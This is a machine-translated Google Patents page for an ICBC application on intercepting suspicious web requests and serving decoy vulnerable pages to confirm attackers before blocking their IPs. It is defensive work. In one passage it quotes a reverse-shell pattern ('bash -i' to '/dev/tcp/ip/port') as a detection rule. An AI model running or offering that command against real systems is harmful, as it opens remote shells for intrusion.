CN115694866A - Interactive attack confirmation method, device, system, equipment and medium - Google Patents

Interactive attack confirmation method, device, system, equipment and medium Download PDF

Info

Publication number
CN115694866A
CN115694866A CN202210855954.5A CN202210855954A CN115694866A CN 115694866 A CN115694866 A CN 115694866A CN 202210855954 A CN202210855954 A CN 202210855954A CN 115694866 A CN115694866 A CN 115694866A
Authority
CN
China
Prior art keywords
attack
user
access request
service access
request
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202210855954.5A
Other languages
Chinese (zh)
Inventor
旷亚和
魏兴
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Industrial and Commercial Bank of China Ltd ICBC
Original Assignee
Industrial and Commercial Bank of China Ltd ICBC
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Industrial and Commercial Bank of China Ltd ICBC filed Critical Industrial and Commercial Bank of China Ltd ICBC
Priority to CN202210855954.5A priority Critical patent/CN115694866A/en
Publication of CN115694866A publication Critical patent/CN115694866A/en
Pending legal-status Critical Current

Links

Images

Landscapes

  • Computer And Data Communications (AREA)

Abstract

The disclosure provides an interactive attack confirmation method, and relates to the field of information security. The method comprises the following steps: intercepting a service access request sent to an application server by a user; performing attack detection on the service access request, wherein the attack detection is used for detecting the attack behavior of the user; and if the service access request hits a specific behavior rule based on the result of the attack detection, returning an attack induction response page in response to the service access request so as to perform interactive attack detection on the user for N times. The attack behavior can be analyzed and intercepted in real time, and the response speed is high. The accuracy of judgment can be improved through multiple interactions, the attack recognition accuracy rate is greatly improved while normal service processing is guaranteed, and the real-time defense capability of a defender is integrally improved. The present disclosure also provides an interactive attack validation apparatus, system, device, storage medium, and program product.

Description

Interactive attack confirmation method, device, system, equipment and medium
Technical Field
The present disclosure relates to the field of information security, and more particularly, to an interactive attack validation method, apparatus, system, device, medium, and program product.
Background
In a network security monitoring scenario, due to the complexity of the applied services, some normal service transactions may also hit the alarm rules, thereby triggering the monitoring device to alarm. In order not to affect the normal operation of the service, many monitoring devices often adopt a release strategy for the behavior that cannot be confirmed as an attack, so that the true attack behavior is likely to be released. At present, for such a situation, the compensation scheme mainly depends on manual confirmation according to historical flow afterwards.
In carrying out the inventive concept of the present disclosure, the inventors have found that there are at least the following problems in the related art: the method for confirming the attack afterwards needs more labor cost, and cannot block the attack behavior in real time in the accident, so that great potential safety hazard exists.
Disclosure of Invention
In view of the foregoing, the present disclosure provides an interactive attack validation method, apparatus, system, device, medium, and program product capable of handling suspected attack behavior in real time.
One aspect of the embodiments of the present disclosure provides an interactive attack validation method, including: intercepting a service access request sent to an application server by a user; performing attack detection on the service access request, wherein the attack detection is used for detecting the attack behavior of the user; and if the service access request hits a specific behavior rule based on the attack detection result, returning an attack induction response page in response to the service access request to perform interactive attack detection on the user for N times, wherein N is an integer greater than or equal to 1, and the attack induction response page has an attack vulnerability.
According to an embodiment of the present disclosure, the performing interactive attack detection on the user for N times includes: circularly executing the following steps until the steps are circularly executed for N times or a preset condition is met, and intercepting an attack induction request sent by the user to the application server, wherein the attack induction request comprises an access request sent by the user in response to the attack induction response page; performing the attack detection on the attack inducement request; and if the attack inducement request hits a specific behavior rule, responding to the attack inducement request and returning the attack inducement response page.
According to the embodiment of the disclosure, the predetermined condition comprises confirming that the attack inducing request hits the attack condition, or confirming that the attack inducing request does not hit the attack condition, if confirming that the attack inducing request hits the attack behavior rule, adding the IP address of the user to the blacklist library, and ending the circulation; or if the attack inducing request is confirmed not to hit the attack behavior rule and the specific behavior rule, confirming that the attack behavior does not exist, and ending the circulation.
According to an embodiment of the present disclosure, before returning the attack-inducement-response page each time, the method further includes: randomly selecting and determining an attack induction response page of the time from an attack test library, wherein the attack test library comprises M attack induction response pages, and each attack induction response page has different attack vulnerabilities.
According to the embodiment of the disclosure, after intercepting a service access request sent by a user to an application server, the method further comprises: storing the service access request based on the user identification of the user; and if the service access request hits the specific behavior rule, carrying out the N times of interactive attack detection based on the user identification.
According to an embodiment of the present disclosure, if it is determined that the attack behavior does not exist, the method further includes: and sending the service access request to the application server.
According to an embodiment of the present disclosure, the performing attack detection on the service access request or the attack inducement request includes: matching the service access request or the attack inducing request by utilizing an attack test library, wherein the attack test library comprises attack behavior rules and the specific behavior rules; and/or performing at least one of the following detection steps: matching the IP address of the user with at least one white list address in a white list library, wherein the at least one white list address is used for directly releasing the service access request; and matching the IP address of the user with at least one blacklist address in a blacklist library, wherein the at least one blacklist address is used for directly blocking the service access request.
Another aspect of the embodiments of the present disclosure provides an interactive attack validation apparatus, including: the request intercepting module is used for intercepting a service access request sent by a user to the application server; the attack detection module is used for carrying out attack detection on the service access request, wherein the attack detection is used for detecting the attack behavior of the user; and the attack induction module is used for responding to the service access request and returning an attack induction response page if the service access request hits a specific behavior rule based on the result of the attack detection so as to perform N times of interactive attack detection on the user, wherein N is an integer greater than or equal to 1, and the attack induction response page has an attack vulnerability.
Another aspect of the embodiments of the present disclosure provides an interactive attack validation system, including: the client is used for responding to the operation of the user and sending a service access request to the application server; the monitoring server is used for executing the interactive attack confirmation method, and sending the service access request to the application server under the condition that the user is confirmed to have no attack behavior; and the application server is used for receiving the service access request sent by the monitoring server.
Another aspect of the disclosed embodiments provides an electronic device, including: one or more processors; a storage device to store one or more programs, wherein the one or more programs, when executed by the one or more processors, cause the one or more processors to perform the method as described above.
Another aspect of the embodiments of the present disclosure also provides a computer-readable storage medium having executable instructions stored thereon, which when executed by a processor, cause the processor to perform the method as described above.
Yet another aspect of the disclosed embodiments provides a computer program product comprising a computer program that when executed by a processor implements the method as described above.
One or more of the above embodiments have the following advantageous effects: firstly, the application server intercepts before receiving a service access request, secondary or multiple attack induction confirmation is carried out on suspected attack flow which hits a specific behavior rule and triggers alarm through attack detection, whether the access request is an attack behavior or not is judged, the attack behavior can be analyzed and intercepted in real time, and the response speed is high. The accuracy of judgment can be improved through multiple interactions, the attack recognition accuracy rate is greatly improved while normal service processing is guaranteed, and the real-time defense capability of a defender is integrally improved.
Drawings
The foregoing and other objects, features and advantages of the disclosure will be apparent from the following description of embodiments of the disclosure, taken in conjunction with the accompanying drawings of which:
FIG. 1 schematically illustrates an architecture diagram of an interactive attack validation system according to an embodiment of the present disclosure;
FIG. 2 schematically shows a block diagram of an attack determination module according to an embodiment of the present disclosure;
FIG. 3 schematically shows a block diagram of an interaction module according to an embodiment of the present disclosure;
FIG. 4 schematically illustrates a flow chart of an interactive attack validation method according to an embodiment of the disclosure;
FIG. 5 schematically illustrates a flow chart for performing attack detection based on user identification according to an embodiment of the disclosure;
FIG. 6 schematically illustrates a flow diagram of interactive attack detection according to an embodiment of the disclosure;
FIG. 7 schematically illustrates a flow diagram of attack detection according to an embodiment of the disclosure;
FIG. 8 schematically illustrates a flow chart of an interactive attack validation method according to another embodiment of the present disclosure;
fig. 9 schematically shows a block diagram of an interactive attack-confirmation device according to an embodiment of the present disclosure; and
fig. 10 schematically shows a block diagram of an electronic device adapted to implement the interactive attack method according to an embodiment of the present disclosure.
Detailed Description
Hereinafter, embodiments of the present disclosure will be described with reference to the accompanying drawings. It should be understood that the description is illustrative only and is not intended to limit the scope of the present disclosure. In the following detailed description, for purposes of explanation, numerous specific details are set forth in order to provide a thorough understanding of the embodiments of the disclosure. It may be evident, however, that one or more embodiments may be practiced without these specific details. Moreover, in the following description, descriptions of well-known structures and techniques are omitted so as to not unnecessarily obscure the concepts of the present disclosure.
The terminology used herein is for the purpose of describing particular embodiments only and is not intended to be limiting of the disclosure. The terms "comprises," "comprising," and the like, as used herein, specify the presence of stated features, steps, operations, and/or components, but do not preclude the presence or addition of one or more other features, steps, operations, or components.
All terms (including technical and scientific terms) used herein have the same meaning as commonly understood by one of ordinary skill in the art unless otherwise defined. It is noted that the terms used herein should be interpreted as having a meaning that is consistent with the context of this specification and should not be interpreted in an idealized or overly formal sense.
Where a convention analogous to "at least one of A, B, and C, etc." is used, in general such a construction is intended in the sense one having skill in the art would understand the convention (e.g., "a system having at least one of A, B, and C" would include but not be limited to systems that have A alone, B alone, C alone, A and B together, A and C together, B and C together, and/or A, B, and C together, etc.).
Fig. 1 schematically shows an architecture diagram of an interactive attack validation system according to an embodiment of the present disclosure. Fig. 2 schematically shows a block diagram of the structure of the attack determination module according to an embodiment of the present disclosure. Fig. 3 schematically shows a block diagram of an interaction module according to an embodiment of the present disclosure.
As shown in fig. 1, an interactive attack validation system 100 according to this embodiment may include a client 101, a monitoring server 102, and an application server 103. The monitoring server 102 may include a roster library determining module 104, an attack determining module 105, an interaction module 106, and an attack blocking module 107. The monitoring server 102 is connected in series in a link between the client 101 and the application server 103, and can capture access traffic from the client 101 to the application server 103 in real time.
According to an embodiment of the present disclosure, the client 101 is configured to send a service access request to the application server 103 in response to an operation by a user. The monitoring server 102 is configured to intercept the service access request. And performing attack detection on the service access request. And based on the result of the attack detection, if the service access request hits a specific behavior rule, returning an attack induction response page in response to the service access request so as to perform interactive attack detection on the user for N times, wherein N is an integer greater than or equal to 1, and the attack induction response page has an attack vulnerability. In case it is confirmed that there is no attack behavior by the user, the service access request is sent to the application server 103. The application server 103 is configured to receive a service access request sent by the monitoring server 102.
Exemplarily, the list library determining module 104 may include a white list library and a black list library, where the white list field includes "access IP Address (Internet Protocol Address)", "triggered attack alarm name", "warehousing time", "validation deadline", and the like, where the "validation deadline" may be defined as 12 hours (only for example), the information is automatically deleted after timeout, if the user triggers an alarm again, the user may enter the white list library after needing to re-verify, and the IP related to the white list library will not be blocked when accessing the application. And the fields of the blacklist library comprise an access IP, a triggered attack alarm name and a storage time, the blacklist library puts the IP address which is judged to have an attack behavior into the blacklist library based on the real-time interception condition, and if a request of the IP in the blacklist library is subsequently received, the blocking is directly carried out.
Illustratively, referring to fig. 2, the attack diagnosis module 107 may include an information collecting unit 201 and an analysis and study unit 202. The information collection unit 201 may collect data related to attack judgment in the traffic information, including information such as a request url, a request method, a request body, and a request header, and record five-tuple data of the traffic packet. The analysis and study unit 202 may perform regular matching on the traffic data acquired by the information acquisition unit 201 based on a built-in rule base, and if an attack feature is hit, directly send the data to the attack blocking module 106 for interception, and if a suspected attack feature is hit, continuously send the data to the interaction module 106 for secondary confirmation of an attack behavior.
Illustratively, referring to fig. 3, the interaction module 106 may include an information storage unit 301 and a test-wrap unit 302. The information storage unit 301 is configured to store original request information of a user, since the monitoring server is deployed before the application server, the monitoring server can take over all traffic of the application server, and when the user makes an inquiry and determines that there is an attack risk in the traffic, the request information of the user is recorded, and then if it is determined that the user does not have an attack behavior, the previously recorded request information is sent to the application server, and the response information is collected and then returned to the user, so as to continue to provide the original service for the user. The test repackaging unit 302 performs interactive attack confirmation according to a preset attack test library.
For example, the attack blocking module 107 may block the attack traffic determined by the attack determining module 105, and add the corresponding "access party IP" and "triggered attack alarm name" to the blacklist library, so as to block all subsequent access requests of the IP. Only if the security personnel unseal the IP access flow in the blacklist can not be sealed continuously.
It should be noted that the interactive attack validation method provided by the embodiment of the present disclosure may be generally executed by the monitoring server 102. Accordingly, the interactive attack validation apparatus provided by the embodiments of the present disclosure may be generally disposed in the monitoring server 102. The interactive attack validation method provided by the embodiment of the present disclosure may also be executed by a server or a server cluster different from the server 102 that monitors the communication of the server 102. Accordingly, the interactive attack verification apparatus provided by the embodiment of the present disclosure may also be disposed in a server or a server cluster different from the server 102 for monitoring communication of the server 102.
It should be understood that the number of clients, monitoring servers, and application servers in fig. 1 is merely illustrative. The monitoring server and the application server may be in a centralized deployment or a distributed deployment. There may be any number of clients, monitoring servers, and application servers, as desired for implementation.
The interactive attack validation method according to the embodiment of the present disclosure will be described in detail below with reference to the system described in fig. 1, with reference to fig. 2 to 8.
Fig. 4 schematically shows a flow chart of an interactive attack validation method according to an embodiment of the present disclosure.
As shown in fig. 4, the interactive attack confirmation of this embodiment includes operations S410 to S430.
In operation S410, a service access request sent by a user to an application server is intercepted.
Illustratively, referring to fig. 1, a user may operate a client 101 installed in a terminal device (such as a mobile phone, a desktop computer, a notebook computer, etc.) to send a service access request to an application server 103, where the request may be an HTTP request. Before the application server 103 receives the request, the traffic access request traffic (a plurality of traffic access requests forming traffic) is captured in advance by the monitoring server 102.
In operation S420, an attack detection is performed on the service access request, where the attack detection is used to detect an attack behavior of a user.
Illustratively, an attack behavior includes any type of offensive action directed to a computer information system, infrastructure, computer network, or personal computer device. For computers and computer networks, destroying, revealing, modifying, disabling software or services, stealing or accessing data from any computer without authorization, is considered an attack in computers and computer networks. Attack detection involves the use of network technologies that are capable of detecting abnormal, illegal activities on the network.
In operation S430, based on the result of the attack detection, if the service access request hits the specific behavior rule, the attack guidance response page is returned in response to the service access request, so as to perform N times of interactive attack detection on the user, where N is an integer greater than or equal to 1, and the attack guidance response page has an attack vulnerability.
Illustratively, if the result of the attack detection indicates that the service access request is a normal request, the service access request is released to the application server. And if the result of the attack detection indicates that the service access request is an attack request, directly blocking.
Illustratively, a particular behavior rule may include one or more high-risk behavior rules. The high-risk behavior rule means that existing detection equipment or detection systems cannot completely confirm existence of an attack behavior, and a release strategy is adopted instead of direct blocking in related technologies. The attack inducing response page induces the user to launch network attack through the existing attack vulnerability, thereby further realizing attack detection in the subsequent user interaction process. An offensive vulnerability includes a flaw in software code that allows an attacker to achieve its offensive behavior without allowing the attacker to access the network or system.
According to the embodiment of the disclosure, firstly, the service access request is intercepted before the application server receives the service access request, the suspected attack flow which is triggered to alarm by hitting the specific behavior rule is subjected to secondary or multiple attack induction confirmation through attack detection, whether the access request is an attack behavior or not is judged, the attack behavior can be analyzed and intercepted in real time, and the response speed is high. The judgment accuracy can be improved through multiple interactions, the attack identification accuracy is greatly improved while normal service processing is guaranteed, and the real-time defense capability of a defender is integrally improved.
Fig. 5 schematically shows a flow chart for performing attack detection based on user identification according to an embodiment of the present disclosure.
After intercepting the service access request sent by the user to the application server in operation S410, as shown in fig. 5, the embodiment performs attack detection based on the user identification, including operations S510 to S520.
In operation S510, the service access request is stored based on the user identification of the user.
For example, referring to fig. 3, the information storage unit 301 may parse the service access request to obtain a user identifier (such as an account number, a cookie, a uid, or the like) to store the original request information of the user, i.e., the service access request. In some embodiments, all traffic intercepted may be stored. In other embodiments, storage may occur when a particular behavior rule is hit, which may save storage space.
In operation S520, if the service access request hits the specific behavior rule, N times of interactive attack detection are performed based on the user identifier.
Because the monitoring server 102 may receive requests from a plurality of clients, when a plurality of service access requests hit a specific behavior rule, a mapping relationship between original request information and interactive attack detection may be formed in an interactive attack detection process by using a unique user identifier, so as to finally accurately process the original request information when confirming whether an attack behavior exists.
Fig. 6 schematically shows a flow diagram of interactive attack detection according to an embodiment of the present disclosure.
As shown in fig. 6, the interactive attack detection of this embodiment includes performing operations S610 to S660 in a loop until the loop is performed N times or a predetermined condition is satisfied.
In operation S610, an attack inducement request sent by a user to an application server is intercepted, where the attack inducement request includes an access request sent by the user in response to an attack inducement response page.
For example, the attack inducement request may be an HTTP request, which is different from the service access request in that the attack inducement request is a request issued by the client through a corresponding operation by the user according to the attack inducement page. The attack guidance page can be displayed to the user in the form of a verification page, such as sliding verification, inputting a verification code or a mobile phone verification code.
In operation S620, attack detection is performed on the attack inducement request.
Illustratively, the same attack detection as the traffic challenge request may be performed for the attack inducement request. In some embodiments, attack detection of different content may also be performed. Specifically, an offensive hole in the attack-inducing page corresponding to the attack-inducing request may be obtained, and a targeted attack detection rule may be adopted for the offensive hole. For example, only the targeted attack detection rule is executed, or the targeted attack detection rule is further added on the basis of the attack detection rule performed on the service access request.
In operation S630, if the attack inducement request hits a specific behavior rule, an attack inducement response page is returned in response to the attack inducement request.
According to an embodiment of the present disclosure, before each return of the attack-inducement-response page, the method further includes: and randomly selecting and determining the attack induction response page from the attack test library, wherein the attack test library comprises M attack induction response pages, and each attack induction response page has different attack vulnerabilities.
Illustratively, the preset attack test library may include an upload file vulnerability test library, an sq1 injection vulnerability test library, a command execution vulnerability test library, and the like. Referring to fig. 3, when performing interactive attack validation, the test repackaging unit 302 randomly selects a page with obvious holes to induce the user to perform an attack attempt. The random selection is mainly made to prevent the hacker from recognizing the attack detection law, because if the hacker triggers a fixed attack inducement page every time he attacks payload, it is easy to recognize that the other party has such protection, and then make a targeted bypass attempt. If the attack penetration is performed by a malicious user, more obvious attack traffic is uploaded with high probability, and if the corresponding attack attempt is matched regularly, the further access of the IP is blocked by using the attack blocking module 107. On the contrary, if the attack characteristics are not found in one or more attack inducements, the user is considered to be a normal user operating the service system, and the 'IP' of the access party can be added into the white list library.
In operation S640, if it is determined that the attack inducing request hits the attack behavior rule, the IP address of the user is added to the blacklist library, and the loop is ended.
Illustratively, the attack behavior rule is used for detecting the attack characteristics in the attack induction request, and when the attack characteristics occur, the existence of the attack behavior can be confirmed.
In operation S650, if it is confirmed that the attack inducement request does not hit the attack behavior rule and the specific behavior rule, it is confirmed that there is no attack behavior, and the loop is ended. The user's IP address is added to the whitelist library.
Taking command execution vulnerability as an example, if a shell command is rebounded by matching bash-i >/dev/tcp/ip/port 0 > &12 > $1 in the attack behavior rule, the shell command is directly blocked for confirmed attack behavior. If the matched request contains touch/tmp words (specific behavior rules), an attack detection behavior may exist, but the command cannot really generate an attack risk, only the attack behavior may exist, and the service function may also exist, so that further judgment is needed, and the scene is sent to the interaction module to perform secondary confirmation of the attack behavior.
According to the embodiment of the disclosure, the flow is monitored in real time through different types of rules, each risky access request can be comprehensively and accurately processed, and the condition that suspected attack requests are released in the related technology and the suspected attack requests are possibly attacked is avoided.
In operation S660, it is confirmed whether the current loop is the nth loop. If so, the loop is ended. If not, operation S610 is re-executed.
Illustratively, the maximum number of interactive verifications can be flexibly configured, and the system can also be internally provided with default values, for example, if no confirmed attack feature is found after three times of interaction, the system can be released.
According to the embodiment of the present disclosure, if it is determined that there is no attack after the loop is finished, the method further includes: and sending the service access request to an application server.
Exemplarily, if after the maximum number of times of interactive authentication is completed, although each time is suspected to be an attack request (hit a specific behavior rule), but the attack behavior is not confirmed, the test loopback unit 302 determines that the user does not have the attack behavior, extracts the user original request information stored in the information storage unit 301 based on the user identifier to perform retransmission, obtains and returns a normal response packet of the original user, continues to provide the original service for the user, and ensures the execution of the original normal service.
Illustratively, there are different ways of handling attack-inducing requests and traffic-access requests. The attack inducement request is used for inducing a potential malicious user to initiate an attack behavior, and the service access request is used for normal service processing of the user request. For example, in the nth cycle, the attack-inducing request either misses an attack-behavior rule and/or a specific behavior rule, or hits a specific behavior rule, in which case the attack-inducing request may be discarded, while the business-access request is released.
Fig. 7 schematically shows a flow diagram of attack detection according to an embodiment of the disclosure.
As shown in fig. 7, the attack detection in operation S420 or operation S620 includes operations S710 to S770.
In operation S710, the IP address of the user is matched with at least one white list address in the white list library, where the at least one white list address is used for directly passing through the service access request.
In operation S720, it is determined whether the IP address of the user is a white list address. If so, operation S730 is performed. If not, operation S740 is performed.
In operation S730, the service access request is directly released to the application server.
In operation S740, the IP address of the user is matched with at least one blacklist address in a blacklist repository, where the at least one blacklist address is used for directly blocking a service access request.
In operation S750, it is determined whether the IP address of the user is a blacklist address. If yes, operation S760 is performed. If not, operation S770 is performed.
In operation S760, the service access request is blocked.
In operation S770, the service access request or the attack-inducing request is matched using an attack test library including attack behavior rules and specific behavior rules.
According to the embodiment of the disclosure, all traffic passes through the monitoring server first, and the list library judging module 104 judges whether the attack IP hits the built-in black and white list, so as to perform the first round of attack filtering. Then, the attack determination module 105 performs a secondary determination on the traffic characteristics, and screens out the traffic with suspected attack characteristics in a regular matching manner. The flow determined as the attack is directly sent to the attack blocking module 107 to be blocked, the access request which is not determined to be the attack behavior is sent to the interaction module 106, the interaction module responds to the page with inductivity, if the access request is the attacker, the new response page is subjected to more obvious attack operation at a high probability, if the attack behavior is continuously found in the new flow, the access request is sent to the attack blocking module to be blocked, and the request which cannot be accurately judged as the attack can be subjected to multiple times of interactive verification until the risk is finally confirmed.
According to the embodiment of the disclosure, the efficiency and the accuracy of attack detection can be improved by matching the white name list library or the black name list library with the attack test library.
It should be noted that the sequence of matching the white list library, the matching black list library and the matching attack test library is not limited to the description in operations S710 to S770. The sequence of the white name matching list library, the black name matching list library and the attack matching test library can be flexibly adjusted according to actual needs.
Fig. 8 schematically shows a flow chart of an interactive attack validation method according to another embodiment of the present disclosure.
As shown in fig. 8, the interactive attack confirmation method of this embodiment includes operations S801 to S808.
Operation S801: and accessing the monitoring server into a network environment, and capturing service access flow in real time.
Operation S802: and inquiring whether the access IP is in a white list library, if so, releasing the request, and then forwarding the request to a target application server (the monitoring server may correspond to a plurality of application servers).
In operation S803: otherwise, inquiring whether the access IP is in the blacklist base, if so, directly losing the packet and blocking the request.
Operation S804: otherwise, judging whether the request flow hits the attack characteristics by using an attack test library, directly releasing the request if the request flow does not match the rules, and then forwarding the request to the target application server. And directly blocking the request by hitting the attack rule, and recording an IP blacklist.
In some embodiments, if neither the attack signature nor the suspected attack signature is hit, the loop may be ended, and the original request information may be released.
Operation S805: and if the high-risk behavior rule is missed, storing the original request information of the user.
Where a miss may refer to a miss on an attack signature in an attack behavior rule, but a hit on a suspected attack signature in a particular behavior rule.
In operation S806: and randomly selecting an attack response page from the attack test library and sending the page to the user.
Operation S807: and judging whether the attack request in the secondary interaction contains the attack characteristics, if so, directly blocking the request and recording an IP blacklist. If the high-risk behavior is still contained, returning to operation S806 to continue to randomly select a response page to be sent to the user, and performing three interactions.
In some embodiments, if neither the attack signature nor the suspected attack signature is hit in a certain cycle, the cycle may be ended and the original request information may be released. In other embodiments, even if the attack characteristic and the suspected attack characteristic are not hit in a certain cycle, the next cycle can be executed continuously because the suspected attack request exists in the interaction.
Operation S808: if no attack behavior is found in the interactive test process and the maximum interactive times are reached, the original user request information stored in operation S805 is pulled, normal service traffic is responded, a white list is recorded at the same time, and the attack judgment is no longer performed on the IP within a period of time.
According to the embodiment of the disclosure, in order to effectively eliminate false alarms, accurately judge and block attack behaviors, and for the flow which cannot be confirmed as the attack behaviors and is monitored in the related technology, the embodiment of the disclosure carries out secondary packet returning or multiple packet returning, triggers interactive verification, judges as a normal user if the verification is passed, judges as the attack behaviors if the verification is not passed, and simultaneously carries out IP (Internet protocol) blocking. The attack behavior can be intercepted in real time, and the accuracy of protective equipment judgment and the real-time of attack interception are greatly improved.
Based on the interactive attack confirmation method, the disclosure also provides an interactive attack confirmation device. The apparatus will be described in detail below with reference to fig. 9.
Fig. 9 schematically shows a block diagram of an interactive attack validation apparatus according to an embodiment of the present disclosure.
As shown in fig. 9, the interactive attack validation apparatus 900 of this embodiment includes a request interception module 910, an attack detection module 920, and an attack induction module 930.
The request intercepting module 910 may perform operation S410 for intercepting a service access request sent by a user to an application server.
The attack detection module 920 may perform operation S420 to perform attack detection on the service access request, where the attack detection is used to detect an attack behavior of the user.
Illustratively, attack detection module 920 may function similarly to roster determination module 104 and attack determination module 105. The attack detection module 920 may implement the judgment contents of the roster library judgment module 104 and the attack judgment module 105.
Illustratively, the attack detection module 920 may perform operations S510 to S520 for storing the service access request based on the user identification of the user after intercepting the service access request sent by the user to the application server. And if the service access request hits the specific behavior rule, carrying out N times of interactive attack detection based on the user identification.
Illustratively, the attack detection module 920 may randomly select an attack-induced-response page for determining the time from an attack test library, where the attack test library includes M attack-induced-response pages, and each attack-induced-response page has a different hackable hole. Operations S710 to S770 may also be performed to match the service access request or the attack-inducing request using an attack test library, which includes attack behavior rules and specific behavior rules. And/or performing at least one of the following detection steps: and matching the IP address of the user with at least one white list address in a white list library, wherein the at least one white list address is used for directly releasing the service access request. And matching the IP address of the user with at least one blacklist address in the blacklist library, wherein the at least one blacklist address is used for directly blocking the service access request.
The attack guidance module 930 may perform operation S430, where based on a result of the attack detection, if the service access request hits the specific behavior rule, the attack guidance response page is returned in response to the service access request, so as to perform N times of interactive attack detection on the user, where N is an integer greater than or equal to 1, and the attack guidance response page has an offensive hole.
Illustratively, the attack guidance module 930 may function similarly to the interaction module 105. Attack inducement module 930 may implement the interaction flow of interaction module 105.
The attack guidance module 930 may perform operations S610 to S660, which are not described in detail.
Illustratively, the interactive attack validation apparatus 900 may further include an attack blocking module 107.
Illustratively, the interactive attack validation apparatus 900 may further include a request release module, configured to send the service access request to the application server if it is confirmed that there is no attack behavior.
It should be noted that the implementation, solved technical problems, implemented functions, and achieved technical effects of each module/unit/subunit and the like in the apparatus part embodiment are respectively the same as or similar to the implementation, solved technical problems, implemented functions, and achieved technical effects of each corresponding step in the method part embodiment, and are not described herein again.
According to the embodiment of the present disclosure, any plurality of the request intercepting module 910, the attack detecting module 920 and the attack inducing module 930 may be combined into one module to be implemented, or any one of them may be split into a plurality of modules. Alternatively, at least part of the functionality of one or more of these modules may be combined with at least part of the functionality of the other modules and implemented in one module.
According to an embodiment of the present disclosure, at least one of the request intercepting module 910, the attack detecting module 920 and the attack inducing module 930 may be implemented at least partially as a hardware circuit, such as a Field Programmable Gate Array (FPGA), a Programmable Logic Array (PLA), a system on a chip, a system on a substrate, a system on a package, an Application Specific Integrated Circuit (ASIC), or may be implemented by hardware or firmware in any other reasonable manner of integrating or packaging a circuit, or implemented in any one of three implementations of software, hardware and firmware, or in a suitable combination of any of them. Alternatively, at least one of the request interception module 910, the attack detection module 920 and the attack induction module 930 may be implemented at least partly as a computer program module, which when executed, may perform a corresponding function.
Fig. 10 schematically shows a block diagram of an electronic device adapted to implement the interactive attack method according to an embodiment of the present disclosure.
As shown in fig. 10, an electronic device 1000 according to an embodiment of the present disclosure includes a processor 1001 that can perform various appropriate actions and processes according to a program stored in a Read Only Memory (ROM) 1002 or a program loaded from a storage section 1008 into a Random Access Memory (RAM) 1003. Processor 1001 may include, for example, a general purpose microprocessor (e.g., a CPU), an instruction set processor and/or associated chipset, and/or a special purpose microprocessor (e.g., an Application Specific Integrated Circuit (ASIC)), among others. The processor 1001 may also include onboard memory for caching purposes. The processor 1001 may include a single processing unit or multiple processing units for performing different actions of a method flow according to embodiments of the present disclosure.
In the RAM1003, various programs and data necessary for the operation of the electronic apparatus 1000 are stored. The processor 1001, ROM 1002, and RAM1003 are connected to each other by a bus 1004. The processor 1001 performs various operations of the method flow according to the embodiments of the present disclosure by executing programs in the ROM 1002 and/or the RAM 1003. Note that the program may also be stored in one or more memories other than the ROM 1002 and the RAM 1003. The processor 1001 may also perform various operations of method flows according to embodiments of the present disclosure by executing programs stored in one or more memories.
Electronic device 1000 may also include an input/output (I/O) interface 1005, the input/output (I/O) interface 1005 also being connected to bus 1004, according to an embodiment of the present disclosure. Electronic device 1000 may also include one or more of the following components connected to I/O interface 1005: an input section 1006 including a keyboard, mouse, and the like. Including an output portion 1007 such as a Cathode Ray Tube (CRT), a Liquid Crystal Display (LCD), and the like, and a speaker and the like. A storage section 1008 including a hard disk and the like. And a communication section 1009 including a network interface card such as a LAN card, a modem, or the like. The communication section 1009 performs communication processing via a network such as the internet. The driver 1010 is also connected to the I/O interface 1005 as necessary. A removable medium 1011 such as a magnetic disk, an optical disk, a magneto-optical disk, a semiconductor memory, or the like is mounted on the drive 1010 as necessary, so that a computer program read out therefrom is mounted into the storage section 1008 as necessary.
The present disclosure also provides a computer-readable storage medium, which may be embodied in the devices/apparatuses/systems described in the above embodiments. Or may exist alone without being assembled into the device/apparatus/system. The computer-readable storage medium carries one or more programs which, when executed, implement a method according to an embodiment of the disclosure.
According to embodiments of the present disclosure, the computer-readable storage medium may be a non-volatile computer-readable storage medium, which may include, for example but is not limited to: a portable computer diskette, a hard disk, a Random Access Memory (RAM), a read-only memory (ROM), an erasable programmable read-only memory (EPROM or flash memory), a portable compact disc read-only memory (CD-ROM), an optical storage device, a magnetic storage device, or any suitable combination of the foregoing. In the present disclosure, a computer readable storage medium may be any tangible medium that can contain, or store a program for use by or in connection with an instruction execution system, apparatus, or device. For example, according to embodiments of the present disclosure, a computer-readable storage medium may include the ROM 1002 and/or the RAM1003 described above and/or one or more memories other than the ROM 1002 and the RAM 1003.
Embodiments of the present disclosure also include a computer program product comprising a computer program containing program code for performing the method illustrated in the flow chart. When the computer program product runs in a computer system, the program code is used for causing the computer system to realize the method provided by the embodiment of the disclosure.
The above-described functions defined in the system/apparatus of the embodiments of the present disclosure are performed when the computer program is executed by the processor 1001. The systems, apparatuses, modules, units, etc. described above may be implemented by computer program modules according to embodiments of the present disclosure.
In one embodiment, the computer program may be hosted on a tangible storage medium such as an optical storage device, a magnetic storage device, and the like. In another embodiment, the computer program may also be transmitted in the form of a signal on a network medium, distributed, downloaded and installed via the communication part 1009, and/or installed from the removable medium 1011. The computer program containing program code may be transmitted using any suitable network medium, including but not limited to: wireless, wired, etc., or any suitable combination of the foregoing.
In such an embodiment, the computer program may be downloaded and installed from a network through the communication part 1009 and/or installed from the removable medium 1011. The computer program performs the above-described functions defined in the system of the embodiment of the present disclosure when executed by the processor 1001. The systems, devices, apparatuses, modules, units, etc. described above may be implemented by computer program modules according to embodiments of the present disclosure.
In accordance with embodiments of the present disclosure, program code for executing computer programs provided by embodiments of the present disclosure may be written in any combination of one or more programming languages, and in particular, these computer programs may be implemented using high level procedural and/or object oriented programming languages, and/or assembly/machine languages. The programming language includes, but is not limited to, programming languages such as Java, C + +, python, the "C" language, or the like. The program code may execute entirely on the user's computing device, partly on the user's device, partly on a remote computing device, or entirely on the remote computing device or server. In situations involving remote computing devices, the remote computing devices may be connected to the user computing device through any kind of network, including a Local Area Network (LAN) or a Wide Area Network (WAN), or may be connected to external computing devices (e.g., through the internet using an internet service provider).
